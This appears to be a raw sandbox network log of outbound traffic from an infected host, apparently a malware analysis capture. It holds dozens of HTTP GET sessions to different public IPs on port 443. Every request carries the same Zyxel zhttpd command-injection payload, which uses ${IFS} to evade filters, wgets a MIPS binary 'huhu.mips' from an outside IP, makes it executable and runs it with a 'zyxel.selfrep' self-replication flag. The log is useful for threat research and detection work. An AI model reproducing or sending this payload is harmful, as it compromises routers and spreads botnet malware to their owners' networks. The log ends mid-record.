                                                        Feb 2, 2024 06:20:56.657757998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1145192.168.2.1460170209.10.99.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657783985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1146192.168.2.1455510198.95.133.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657814026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1147192.168.2.1439684162.119.225.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657840014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1148192.168.2.1458530172.237.214.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657902002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1149192.168.2.145759690.99.209.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657962084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1150192.168.2.145561845.96.253.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.657979965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1151192.168.2.1447078183.242.129.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658046961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1152192.168.2.144543840.16.156.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658078909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1153192.168.2.1458172146.179.245.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658122063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1154192.168.2.1458254138.68.67.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658143997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1155192.168.2.143656839.207.169.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658175945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1156192.168.2.145917689.158.57.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658236027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1157192.168.2.1446222146.245.16.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658277988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1158192.168.2.1460696138.213.38.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658314943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1159192.168.2.1432868204.209.206.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658353090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1160192.168.2.1436542210.234.5.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658404112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1161192.168.2.145324284.158.36.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658444881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1162192.168.2.14481908.16.153.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658478022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1163192.168.2.14548605.58.170.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658504009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1164192.168.2.144178873.23.169.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658556938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1165192.168.2.1457828134.181.185.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658572912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1166192.168.2.143766460.78.121.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658633947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1167192.168.2.145911872.225.13.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658683062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1168192.168.2.1433146188.55.234.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658730984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1169192.168.2.1452302200.145.221.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658766031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1170192.168.2.144033037.39.31.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658838987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1171192.168.2.144592890.211.248.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658873081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1172192.168.2.144715049.248.9.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658924103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1173192.168.2.1438738174.124.95.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.658970118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1174192.168.2.144803066.115.130.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659019947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1175192.168.2.144821414.179.68.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659060001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1176192.168.2.1440776196.255.185.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659085989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1177192.168.2.144764265.113.61.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659123898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1178192.168.2.1456634186.33.191.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659177065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1179192.168.2.1456668122.157.84.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659207106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1180192.168.2.1453438149.247.0.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659250975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1181192.168.2.1459234194.23.230.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659286022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1182192.168.2.1442686111.110.76.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659329891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1183192.168.2.1452590145.127.70.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659362078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1184192.168.2.1449702161.14.168.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659398079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1185192.168.2.1446292160.240.24.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659440994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1186192.168.2.1433458222.191.121.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659492016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1187192.168.2.1455668154.83.141.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659533978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1188192.168.2.144897679.104.100.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659557104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1189192.168.2.144134667.159.39.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659629107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1190192.168.2.1433058202.105.243.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659646988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1191192.168.2.1450818185.221.153.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659684896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192192.168.2.14596164.131.179.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659727097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1193192.168.2.144796874.18.108.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659759045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1194192.168.2.144135861.226.248.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659801960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1195192.168.2.1457068195.64.30.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659862041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1196192.168.2.1453846112.231.213.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659909010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1197192.168.2.1445294161.253.132.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659934044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1198192.168.2.1441762186.155.87.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.659981966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1199192.168.2.1454326135.5.138.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660033941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1200192.168.2.145188245.121.250.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660072088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1201192.168.2.1446366213.121.47.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660120010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1202192.168.2.1443620199.10.11.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660145044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1203192.168.2.144570232.38.133.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660176039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1204192.168.2.145793031.255.128.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660221100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1205192.168.2.1434998168.108.210.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660259962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1206192.168.2.1444410206.96.16.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:56.660306931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1207192.168.2.1438378160.252.216.202443
                                                        TimestampBytes transferredDirectionData
